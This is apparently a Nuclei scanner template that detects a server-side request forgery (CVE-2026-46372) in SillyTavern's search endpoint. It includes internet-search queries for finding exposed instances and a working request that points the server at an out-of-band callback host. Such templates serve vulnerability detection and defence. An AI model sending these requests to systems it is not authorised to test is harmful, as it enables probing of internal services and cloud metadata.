id: CVE-2026-46372 info: name: SillyTavern - Server-Side Request Forgery author: theamanrawat severity: high description: | SillyTavern versions up to and including 1.17.0 expose the /api/search/searxng endpoint, which accepts an attacker-controlled baseUrl parameter and uses it directly to build outbound server-side fetch requests. An authenticated low-privilege user can point baseUrl at an internal or loopback HTTP service and receive the full response body, enabling read access to internal services, cloud metadata endpoints, and private network resources. remediation: Upgrade SillyTavern to version 1.18.0 or later, which introduces a Private Request Whitelisting filter. Enable and properly configure the filter when hosting over a network. reference: - https://github.com/SillyTavern/SillyTavern/security/advisories/GHSA-qg89-qwwh-5f3j - https://nvd.nist.gov/vuln/detail/CVE-2026-46372 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N cvss-score: 8.5 cve-id: CVE-2026-46372 epss-score: 0.02589 epss-percentile: 0.85856 cwe-id: CWE-918 metadata: verified: true max-request: 3 shodan-query: http.title:"SillyTavern" fofa-query: title="SillyTavern" tags: cve,cve2026,sillytavern,nodejs,ssrf,unauthenticated flow: http(1) && http(2) http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} matchers: - type: word part: body words: - "SillyTavern" internal: true - raw: - | GET /csrf-token HTTP/1.1 Host: {{Hostname}} - | POST /api/search/searxng HTTP/1.1 Host: {{Hostname}} Content-Type: application/json X-CSRF-Token: {{csrf_token}} {"baseUrl":"http://{{interactsh-url}}/","query":"x"} extractors: - type: json name: csrf_token part: body internal: true json: - '.token' matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http" - type: word part: interactsh_request words: - "GET" # digest: 490a004630440220703a0853666e358fb7df8c3bec63b70c5b042538edbdb4b768a156fffddfe475022026e8d5bfda22338b135cf730ed585056d8b8f3d9c29be2ed49984b84f0b1e7f5:922c64590222798bb761d5b6d8e72950